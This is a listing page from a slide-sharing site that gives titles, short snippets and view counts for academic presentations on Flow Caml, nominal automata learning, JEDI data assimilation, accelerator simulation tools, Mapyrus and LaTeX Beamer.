First APPSEM-II Workshop (Nottingham) 26th to 28th March 2003 Flow Caml in a Nutshell Vincent Simonet INRIA Rocquencourt Cristal project Vincent.Simonet@inria.fr http://cristal.inria.fr/~simonet/ 2 Flow Caml in a Nutshell The

704 views • 10 slides
Learning Nominal Automata Joshua Moerman Matteo Sammartino , Alexandra Silva (Radboud University)

Learning Nominal Automata Joshua Moerman Matteo Sammartino , Alexandra Silva (Radboud University)

Learning Nominal Automata Joshua Moerman Matteo Sammartino , Alexandra Silva (Radboud University) (University College London) Bartek Klin, Micha Szynwelski (Warsaw University) POPL 2017 Paris Active learning queries System Learner

808 views • 36 slides
The Joint Effort for Data assimilation Integration (JEDI) OOPS Observation Space Joint Center

The Joint Effort for Data assimilation Integration (JEDI) OOPS Observation Space Joint Center

The Joint Effort for Data assimilation Integration (JEDI) OOPS Observation Space Joint Center for Satellite Data Assimilation (JCSDA) JEDI Academy 16-20 November 2020 OOPS Observation Space OOPS interfaces related to observations:

507 views • 27 slides
Using elegant, SDDS, and DQS for High-Productivity Accelerator Design and Simulation Michael

Using elegant, SDDS, and DQS for High-Productivity Accelerator Design and Simulation Michael

ADVANCED PHOTON SOURCE Operations Analysis Group http://www.aps.anl.gov/asd/oag Michael Borland borland@aps.anl.gov Using elegant, SDDS, and DQS for High-Productivity Accelerator Design and Simulation Michael Borland Operations

839 views • 42 slides
Mapyrus is a software project created by Simon Chenery ( simoc@users.sourceforge.net )

Mapyrus is a software project created by Simon Chenery ( simoc@users.sourceforge.net )

Mapyrus is a software project created by Simon Chenery ( simoc@users.sourceforge.net ) Mapyrus is available for download from SourceForge ( http://mapyrus.sourceforge.net ) Mapyrus is software for creating plots of points, lines,

332 views • 17 slides
Making Presentations with L A T EX: Package Beamer Xavier Pers eguers June 25, 2004 Xavier

Making Presentations with L A T EX: Package Beamer Xavier Pers eguers June 25, 2004 Xavier

Outline Introduction Beamer Making Presentations with L A T EX: Package Beamer Xavier Pers eguers June 25, 2004 Xavier Pers eguers Making Presentations with L A T EX: Package Beamer Outline Introduction Beamer Introduction 1

1.11k views • 94 slides

More recommend